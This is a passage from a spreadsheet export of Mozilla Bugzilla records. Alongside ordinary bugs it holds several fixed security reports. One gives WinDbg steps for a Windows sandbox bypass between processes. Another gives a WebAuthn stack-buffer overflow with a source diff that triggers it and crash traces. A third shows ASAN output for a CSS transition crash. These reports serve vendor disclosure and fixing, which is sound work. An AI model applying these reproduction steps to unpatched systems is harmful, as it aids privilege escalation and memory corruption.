      <c r="N4341" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4341" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4341" t="inlineStr"/>
      <c r="Q4341" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4341" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4341" t="inlineStr">
        <is>
          <t>mozilla0.9.7</t>
        </is>
      </c>
      <c r="T4341" t="n">
        <v>1</v>
      </c>
      <c r="U4341" t="n">
        <v>0</v>
      </c>
      <c r="V4341" t="n">
        <v>10</v>
      </c>
      <c r="W4341" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.1+) Gecko/20010622
BuildID:    2001062211
Reproducible: Always
Steps to Reproduce:
1. Assume you have multiple profiles set up in the profile manager.
2. Start mozilla (no command switches at all).
3. You'll be prompted to choose a profile to start with.
4. Press "Manage Profiles..." button (either by mouse or keyboard).
5. Keyboard focus is lost forever, no matter how you Tab/Shift-Tab it.
Actual Results:  Keyboard focus is lost.
Expected Results:  Keyboard focus should rest on the "Create", "Rename" or
"Delete profiles" button.</t>
        </is>
      </c>
      <c r="X4341" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4342">
      <c r="A4342" t="n">
        <v>819053</v>
      </c>
      <c r="B4342" t="inlineStr">
        <is>
          <t>2012-12-06 12:44:17 -0800</t>
        </is>
      </c>
      <c r="C4342" t="inlineStr">
        <is>
          <t>Create public certificate for signing apps on prod.</t>
        </is>
      </c>
      <c r="D4342" t="inlineStr">
        <is>
          <t>2014-09-24 14:06:49 -0700</t>
        </is>
      </c>
      <c r="E4342" t="n">
        <v>1</v>
      </c>
      <c r="F4342" t="n">
        <v>1</v>
      </c>
      <c r="G4342" t="n">
        <v>2</v>
      </c>
      <c r="H4342" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4342" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J4342" t="inlineStr">
        <is>
          <t>Operations: Marketplace</t>
        </is>
      </c>
      <c r="K4342" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4342" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4342" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4342" t="inlineStr">
        <is>
          <t>[temp cert verified][waiting on instructions for hsm generated cert]</t>
        </is>
      </c>
      <c r="Q4342" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4342" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4342" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4342" t="n">
        <v>1</v>
      </c>
      <c r="U4342" t="n">
        <v>0</v>
      </c>
      <c r="V4342" t="n">
        <v>32</v>
      </c>
      <c r="W4342" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #793876 +++
We need to create the real, public certificate for signing apps on -prod.</t>
        </is>
      </c>
      <c r="X4342" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4343">
      <c r="A4343" t="n">
        <v>39526</v>
      </c>
      <c r="B4343" t="inlineStr">
        <is>
          <t>2000-05-16 17:01:01 -0700</t>
        </is>
      </c>
      <c r="C4343" t="inlineStr">
        <is>
          <t>show_activity.cgi doesn't check viewing permissions</t>
        </is>
      </c>
      <c r="D4343" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E4343" t="n">
        <v>1</v>
      </c>
      <c r="F4343" t="n">
        <v>1</v>
      </c>
      <c r="G4343" t="n">
        <v>4</v>
      </c>
      <c r="H4343" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4343" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4343" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4343" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4343" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4343" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N4343" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4343" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4343" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q4343" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4343" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4343" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T4343" t="n">
        <v>1</v>
      </c>
      <c r="U4343" t="n">
        <v>0</v>
      </c>
      <c r="V4343" t="n">
        <v>12</v>
      </c>
      <c r="W4343" t="inlineStr">
        <is>
          <t>http://bugzilla.mozilla.org/show_bug.cgi?id=28698 gives "permission denied".
http://bugzilla.mozilla.org/show_activity.cgi?id=28698 is visible.</t>
        </is>
      </c>
      <c r="X4343" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4344">
      <c r="A4344" t="n">
        <v>1554110</v>
      </c>
      <c r="B4344" t="inlineStr">
        <is>
          <t>2019-05-24 02:46:14 -0700</t>
        </is>
      </c>
      <c r="C4344" t="inlineStr">
        <is>
          <t>Windows sandbox: renderer processes can open each and unrelated Chromium processes</t>
        </is>
      </c>
      <c r="D4344" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:43 -0700</t>
        </is>
      </c>
      <c r="E4344" t="n">
        <v>1</v>
      </c>
      <c r="F4344" t="n">
        <v>1</v>
      </c>
      <c r="G4344" t="n">
        <v>3</v>
      </c>
      <c r="H4344" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4344" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4344" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K4344" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4344" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4344" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4344" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4344" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4344" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][post-critsmash-triage][adv-main76+][adv-ESR68.8+]</t>
        </is>
      </c>
      <c r="Q4344" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4344" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4344" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4344" t="n">
        <v>1</v>
      </c>
      <c r="U4344" t="n">
        <v>0</v>
      </c>
      <c r="V4344" t="n">
        <v>42</v>
      </c>
      <c r="W4344" t="inlineStr">
        <is>
          <t>Chromium uses the following code to prevent access between renderers, and from renderers to other low integrity processes: https://cs.chromium.org/chromium/src/services/service_manager/sandbox/win/sandbox_win.cc?l=430
```
  result = policy-&gt;SetTokenLevel(sandbox::USER_RESTRICTED_SAME_ACCESS,
                                 sandbox::USER_LOCKDOWN);
  if (result != sandbox::SBOX_ALL_OK)
    return result;
  // Prevents the renderers from manipulating low-integrity processes.
  result = policy-&gt;SetDelayedIntegrityLevel(sandbox::INTEGRITY_LEVEL_UNTRUSTED);
```
In SandboxBroker::SetSecurityLevelForContentProcess of Firefox with aSandboxLevel &lt; 20 however, the delayed integrity level is set to INTEGRITY_LEVEL_LOW: https://dxr.mozilla.org/mozilla-central/source/security/sandbox/win/src/sandboxbroker/sandboxBroker.cpp#432
This means that content processes can open and manipulate each other, and also to some other Chromium-based processes such as the Chrome or Electron GPU process (an example is the Slack desktop application).  I verified this in Firefox 67 by attaching to a renderer process with WinDbg and calling OpenProcess(PROCESS_VM_WRITE, 0, &lt;PID&gt;) to check if the result is non-zero. The steps for doing so are as follows (on Windows 10):
```
bp kernel32!ReadFile
g  
# wait for breakpoint to hit
eq KERNEL32!_imp_ReadFile kernel32!OpenProcessStub
eq @rsp deadbeef
r @rcx=0x20
r @rdx=0
r @r8=0n&lt;PID&gt;
g
# will crash at 0xdeadbeef because we changed the return address
r @rax   # non-zero if opening was successfully
```
One direct consequence of this within Firefox itself is that a web renderer process can escalate privileges to file and web extension processes which are potentially more trusted. See also bug 1538028, file processes can read the entire filesystem.
Another consequence is that we can get control of a process before it calls LowerToken(). This clearly goes against the idea of the sandbox, even though it probably only means a minor increase of kernel attack surface in the case of Firefox. If a Chromium-like win32k lockdown mechanism will ever be introduced in the future, this would be a bypass. 
Also, I could imagine that this could affect site isolation in the future.</t>
        </is>
      </c>
      <c r="X4344" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4345">
      <c r="A4345" t="n">
        <v>1755621</v>
      </c>
      <c r="B4345" t="inlineStr">
        <is>
          <t>2022-02-15 21:20:02 -0800</t>
        </is>
      </c>
      <c r="C4345" t="inlineStr">
        <is>
          <t>WinWebAuthnManager::Register stack-buffer overflow</t>
        </is>
      </c>
      <c r="D4345" t="inlineStr">
        <is>
          <t>2024-05-30 10:54:03 -0700</t>
        </is>
      </c>
      <c r="E4345" t="n">
        <v>1</v>
      </c>
      <c r="F4345" t="n">
        <v>1</v>
      </c>
      <c r="G4345" t="n">
        <v>3</v>
      </c>
      <c r="H4345" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4345" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4345" t="inlineStr">
        <is>
          <t>DOM: Web Authentication</t>
        </is>
      </c>
      <c r="K4345" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4345" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4345" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4345" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4345" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4345" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][adv-main99+][adv-esr91.8+]</t>
        </is>
      </c>
      <c r="Q4345" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4345" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4345" t="inlineStr">
        <is>
          <t>100 Branch</t>
        </is>
      </c>
      <c r="T4345" t="n">
        <v>1</v>
      </c>
      <c r="U4345" t="n">
        <v>0</v>
      </c>
      <c r="V4345" t="n">
        <v>21</v>
      </c>
      <c r="W4345" t="inlineStr">
        <is>
          <t>Hello,
Please let me know if you'd like me to provide more information to have this report considered in the high-quality tier.
Cheers
# WinWebAuthnManager::Register stack-buffer overflow
## Root cause analysis
The issue can be seen in the `WinWebAuthnManager::Register` function; in the below lines:
```c++
void WinWebAuthnManager::Register(
    PWebAuthnTransactionParent* aTransactionParent,
    const uint64_t&amp; aTransactionId, const WebAuthnMakeCredentialInfo&amp; aInfo) {
// ...
  WEBAUTHN_EXTENSION rgExtension[1] = {};
// ...
    for (const WebAuthnExtension&amp; ext : extra.Extensions()) {
      MOZ_ASSERT(cExtensions &lt;
                 (int)(sizeof(rgExtension) / sizeof(rgExtension[0])));
      if (ext.type() == WebAuthnExtension::TWebAuthnExtensionHmacSecret) {
        HmacCreateSecret =
            ext.get_WebAuthnExtensionHmacSecret().hmacCreateSecret() == true;
        if (HmacCreateSecret) {
          rgExtension[cExtensions].pwszExtensionIdentifier =
              WEBAUTHN_EXTENSIONS_IDENTIFIER_HMAC_SECRET;
          rgExtension[cExtensions].cbExtension = sizeof(BOOL);
          rgExtension[cExtensions].pvExtension = &amp;HmacCreateSecret;
          cExtensions++;
        }
      }
```
A compromised renderer process is able to provide more than 1 extension which makes the above code corrupt adjacent stack memory. I don't believe it is possible to reach this state with plain Javascript.
Here is what a crash looks like when hitting the stack guard page (when sending a lot of extensions):
```
0:007&gt; g
(1920.298c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!mozilla::dom::WinWebAuthnManager::Register+0x30d:
00007ffc`bd4b7d9d 4c898cd4f0010000 mov     qword ptr [rsp+rdx*8+1F0h],r9 ss:0000009d`48300000=????????????????
0:007&gt; kp
 # Child-SP          RetAddr               Call Site
00 0000009d`482fe4c0 00007ffc`bd4b7a6d     xul!mozilla::dom::WinWebAuthnManager::Register(class mozilla::dom::PWebAuthnTransactionParent * aTransactionParent = &lt;Value unavailable error&gt;, unsigned int64 * aTransactionId = 0x0000009d`482fe778, class mozilla::dom::WebAuthnMakeCredentialInfo * aInfo = &lt;Value unavailable error&gt;)+0x30d [c:\mozilla-source\mozilla-unified\dom\webauthn\WinWebAuthnManager.cpp @ 301] 
01 0000009d`482fe710 00007ffc`bb7f1f88     xul!mozilla::dom::WebAuthnTransactionParent::RecvRequestRegister(unsigned int64 * aTransactionId = &lt;Value unavailable error&gt;, class mozilla::dom::WebAuthnMakeCredentialInfo * aTransactionInfo = &lt;Value unavailable error&gt;)+0x1d [c:\mozilla-source\mozilla-unified\dom\webauthn\WebAuthnTransactionParent.cpp @ 27] 
02 0000009d`482fe740 0000009d`482fe680     xul!mozilla::dom::PWebAuthnTransactionParent::OnMessageReceived(class IPC::Message * msg__ = 0x0000009d`482fe680)+0x1c8 [c:\mozilla-source\mozilla-unified\obj-x86_64-pc-mingw32\ipc\ipdl\PWebAuthnTransactionParent.cpp @ 257] 
```
## Reproduction information
I've verified that the issue is present in the latest available tree; here's where my tree is synchronized to:
```
$ hg log
changeset:   679353:0fae6a6b254a
bookmark:    autoland
tag:         tip
user:        Jamie Nicol &lt;jnicol@mozilla.com&gt;
date:        Tue Feb 15 20:26:12 2022 +0000
summary:     Bug 1755375 - Don't generate crash reports when android kills the GPU process. r=agi
```
The bug only affects Windows and doesn't need any specific hardware to reproduce.
## Reproducing the issue
1. Apply the following diff to a recent Firefox checkout:
```diff
$ hg diff
diff --git a/dom/webauthn/WebAuthnManager.cpp b/dom/webauthn/WebAuthnManager.cpp
--- a/dom/webauthn/WebAuthnManager.cpp
+++ b/dom/webauthn/WebAuthnManager.cpp
@@ -367,16 +367,19 @@ already_AddRefed&lt;Promise&gt; WebAuthnManage
   if (!MaybeCreateBackgroundActor()) {
     promise-&gt;MaybeReject(NS_ERROR_DOM_OPERATION_ERR);
     return promise.forget();
   }
   // TODO: Add extension list building
   nsTArray&lt;WebAuthnExtension&gt; extensions;
+  for (size_t i = 0; i &lt; 288; i++) {
+    extensions.AppendElement(WebAuthnExtensionHmacSecret(true));
+  }
   // &lt;https://fidoalliance.org/specs/fido-v2.0-ps-20190130/fido-client-to-authenticator-protocol-v2.0-ps-20190130.html#sctn-hmac-secret-extension&gt;
   if (aOptions.mExtensions.mHmacCreateSecret.WasPassed()) {
     bool hmacCreateSecret = aOptions.mExtensions.mHmacCreateSecret.Value();
     if (hmacCreateSecret) {
       extensions.AppendElement(WebAuthnExtensionHmacSecret(hmacCreateSecret));
     }
   }
```
1. Rebuild and run the browser under a debugger or attach a debugger to the browser process (`windbgx -p &lt;pid&gt;`)
```
$ ./mach run --debug
```
1. Run a local HTTP server to server `trigger.html`
```
$ python3 -m http.server
```
1. Visit `http://localhost:8000/trigger.html`
1. The browser process should have crashed with something similar than below:
```
0:007&gt; g
(1920.298c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!mozilla::dom::WinWebAuthnManager::Register+0x30d:
00007ffc`bd4b7d9d 4c898cd4f0010000 mov     qword ptr [rsp+rdx*8+1F0h],r9 ss:0000009d`48300000=????????????????
0:007&gt; kp
 # Child-SP          RetAddr               Call Site
00 0000009d`482fe4c0 00007ffc`bd4b7a6d     xul!mozilla::dom::WinWebAuthnManager::Register(class mozilla::dom::PWebAuthnTransactionParent * aTransactionParent = &lt;Value unavailable error&gt;, unsigned int64 * aTransactionId = 0x0000009d`482fe778, class mozilla::dom::WebAuthnMakeCredentialInfo * aInfo = &lt;Value unavailable error&gt;)+0x30d [c:\mozilla-source\mozilla-unified\dom\webauthn\WinWebAuthnManager.cpp @ 301] 
01 0000009d`482fe710 00007ffc`bb7f1f88     xul!mozilla::dom::WebAuthnTransactionParent::RecvRequestRegister(unsigned int64 * aTransactionId = &lt;Value unavailable error&gt;, class mozilla::dom::WebAuthnMakeCredentialInfo * aTransactionInfo = &lt;Value unavailable error&gt;)+0x1d [c:\mozilla-source\mozilla-unified\dom\webauthn\WebAuthnTransactionParent.cpp @ 27] 
02 0000009d`482fe740 0000009d`482fe680     xul!mozilla::dom::PWebAuthnTransactionParent::OnMessageReceived(class IPC::Message * msg__ = 0x0000009d`482fe680)+0x1c8 [c:\mozilla-source\mozilla-unified\obj-x86_64-pc-mingw32\ipc\ipdl\PWebAuthnTransactionParent.cpp @ 257] 
```
## Exploitability
Although it is a stack overflow it doesn't seem very exploitable at first sight. I haven't really tried but the attacker doesn't control the data being overflown. You might be able to corrupt local from parent frames and do something interesting.</t>
        </is>
      </c>
      <c r="X4345" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4346">
      <c r="A4346" t="n">
        <v>1692684</v>
      </c>
      <c r="B4346" t="inlineStr">
        <is>
          <t>2021-02-13 06:13:27 -0800</t>
        </is>
      </c>
      <c r="C4346" t="inlineStr">
        <is>
          <t>ASAN: runtime error: index out of bounds for type 'nsCSSPropertyIDSet::property_set_type const[6]'</t>
        </is>
      </c>
      <c r="D4346" t="inlineStr">
        <is>
          <t>2024-05-30 10:27:37 -0700</t>
        </is>
      </c>
      <c r="E4346" t="n">
        <v>1</v>
      </c>
      <c r="F4346" t="n">
        <v>1</v>
      </c>
      <c r="G4346" t="n">
        <v>3</v>
      </c>
      <c r="H4346" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4346" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4346" t="inlineStr">
        <is>
          <t>CSS Transitions and Animations</t>
        </is>
      </c>
      <c r="K4346" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4346" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4346" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4346" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main87+]</t>
        </is>
      </c>
      <c r="Q4346" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4346" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4346" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T4346" t="n">
        <v>1</v>
      </c>
      <c r="U4346" t="n">
        <v>0</v>
      </c>
      <c r="V4346" t="n">
        <v>17</v>
      </c>
      <c r="W4346" t="inlineStr">
        <is>
          <t xml:space="preserve">Created attachment 9203045
testcase.html
After visit the testcase.html, the tab crashes immediately. 
Interestingly ASAN shows `runtime error: index 288230376151711743 out of bounds for type 'nsCSSPropertyIDSet::property_set_type const[6]'` when attach with GDB I got `SIGBUS` signal with one of CPU register show `0x3ffffffffffffff` (288230376151711743 decimal to hex).
On the debug build, it throw assertion failure as follow:
`Assertion failure: false (MOZ_ASSERT_UNREACHABLE: Transition effect has unexpected shape), at /home/sourc7/git/gecko-dev-desktop/dom/animation/CSSTransition.cpp:332`
## Affected version:
- Firefox 87.0a1 (2021-02-12) (64-bit)
- Firefox 85.0.2 (64-bit)
## Unaffected version:
- Firefox 78.7.1esr (64-bit)
## AddressSanitizer output:
```
/builds/worker/workspace/obj-build/dist/include/nsCSSPropertyIDSet.h:65:13: runtime error: index 288230376151711743 out of bounds for type 'nsCSSPropertyIDSet::property_set_type const[6]'
    #0 0x7f33732c2ba9 in nsCSSPropertyIDSet::HasProperty(nsCSSPropertyID) const /builds/worker/workspace/obj-build/dist/include/nsCSSPropertyIDSet.h:65:13
    #1 0x7f3378663bda in nsTransitionManager::DoUpdateTransitions(nsStyleDisplay const&amp;, mozilla::dom::Element*, mozilla::PseudoStyleType, mozilla::AnimationCollection&lt;mozilla::dom::CSSTransition&gt;*&amp;, mozilla::ComputedStyle const&amp;, mozilla::ComputedStyle const&amp;) /builds/worker/checkouts/gecko/layout/style/nsTransitionManager.cpp:178:37
    #2 0x7f33786635a5 in nsTransitionManager::UpdateTransitions(mozilla::dom::Element*, mozilla::PseudoStyleType, mozilla::ComputedStyle const&amp;, mozilla::ComputedStyle const&amp;) /builds/worker/checkouts/gecko/layout/style/nsTransitionManager.cpp:66:10
    #3 0x7f3378592e6c in Gecko_UpdateAnimations /builds/worker/checkouts/gecko/layout/style/GeckoBindings.cpp:557:39
    #4 0x7f337f357fb8 in _$LT$style..gecko..wrapper..GeckoElement$u20$as$u20$style..dom..TElement$GT$::update_animations::h706a661a2cc87be0 /builds/worker/checkouts/gecko/servo/components/style/gecko/wrapper.rs:1533:13
    #5 0x7f337dacad80 in style::context::SequentialTask$LT$E$GT$::execute::hb77eddccbfe6f69a /builds/worker/checkouts/gecko/servo/components/style/context.rs:499:17
    #6 0x7f337dacad80 in _$LT$style..context..SequentialTaskList$LT$E$GT$$u20$as$u20$core..ops..drop..Drop$GT$::drop::ha99886dfdfd0ee66 /builds/worker/checkouts/gecko/servo/components/style/context.rs:627:13
    #7 0x7f337dacad80 in core::ptr::drop_in_place::h72e47b2865f67285 /builds/worker/fetches/rustc/lib/rustlib/src/rust/library/core/src/ptr/mod.rs:175:1
    #8 0x7f337dacad80 in core::ptr::drop_in_place::h34b976fde6975c35 /builds/worker/fetches/rustc/lib/rustlib/src/rust/library/core/src/ptr/mod.rs:175:1
    #9 0x7f337daba91b in style::driver::traverse_dom::hc09c3e623ef18d07 /builds/worker/checkouts/gecko/servo/components/style/driver.rs:193:1
    #10 0x7f337dab3f5d in geckoservo::glue::traverse_subtree::hb212a434182b9665 /builds/worker/checkouts/gecko/servo/ports/geckolib/glue.rs:265:5
    #11 0x7f337dab3257 in Servo_TraverseSubtree /builds/worker/checkouts/gecko/servo/ports/geckolib/glue.rs:325:5
    #12 0x7f33785e8482 in mozilla::ServoStyleSet::StyleDocument(mozilla::ServoTraversalFlags) /builds/worker/checkouts/gecko/layout/style/ServoStyleSet.cpp:744:9
    #13 0x7f3378736131 in mozilla::RestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/checkouts/gecko/layout/base/RestyleManager.cpp:2981:20
    #14 0x7f33786fced3 in ProcessPendingRestyles /builds/worker/checkouts/gecko/layout/base/RestyleManager.cpp:3111:3
    #15 0x7f33786fced3 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:4215:39
    #16 0x7f3373ea9244 in FlushPendingNotifications /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:1422:5
    #17 0x7f3373ea9244 in mozilla::dom::Document::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/checkouts/gecko/dom/base/Document.cpp:10331:16
    #18 0x7f3373ee7f58 in FlushPendingNotifications /builds/worker/checkouts/gecko/dom/base/Document.cpp:10252:3
    #19 0x7f3373ee7f58 in GetPrimaryFrame /builds/worker/checkouts/gecko/dom/base/Element.cpp:250:10
    #20 0x7f3373ee7f58 in mozilla::dom::Element::GetScrollFrame(nsIFrame**, mozilla::FlushType) /builds/worker/checkouts/gecko/dom/base/Element.cpp:620:21
    #21 0x7f3373ee861c in mozilla::dom::Element::Scroll(mozilla::gfx::IntPointTyped&lt;mozilla::CSSPixel&gt; const&amp;, mozilla::dom::ScrollOptions const&amp;) /builds/worker/checkouts/gecko/dom/base/Element.cpp:746:28
    #22 0x7f3373ee8834 in mozilla::dom::Element::Scroll(double, double) /builds/worker/checkouts/gecko/dom/base/Element.cpp:761:3
    #23 0x7f337563fddc in mozilla::dom::Element_Binding::scroll(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/obj-build/dom/bindings/ElementBinding.cpp:3283:28
    #24 0x7f3375a29d33 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3233:13
    #25 0x7f337bbc64d6 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:435:13
    #26 0x7f337bbc64d6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:520:12
    #27 0x7f337bbc826e in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:580:10
    #28 0x7f337bbb155d in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:584:10
    #29 0x7f337bbb155d in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3243:16
    #30 0x7f337bb952c3 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:405:13
    #31 0x7f337bbc6606 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:552:13
    #32 0x7f337bbc826e in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:580:10
    #33 0x7f337bbc84eb in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:597:8
    #34 0x7f337c427bd2 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/jsapi.cpp:2861:10
    #35 0x7f33756791dc in mozilla::dom::EventHandlerNonNull::Call(mozilla::dom::BindingCallContext&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/obj-build/dom/bindings/EventHandlerBinding.cpp:279:37
    #36 0x7f33761dc721 in void mozilla::dom::EventHandlerNonNull::Call&lt;nsCOMPtr&lt;mozilla::dom::EventTarget&gt; &gt;(nsCOMPtr&lt;mozilla::dom::EventTarget&gt; const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/EventHandlerBinding.h:366:12
    #37 0x7f33761daaac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/checkouts/gecko/dom/events/JSEventHandler.cpp:201:12
    #38 0x7f33761a4a06 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1107:22
    #39 0x7f33761a6097 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1298:17
    #40 0x7f337619376e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:353:17
    #41 0x7f3376191fe0 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:555:16
    #42 0x7f33761962b5 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:1098:11
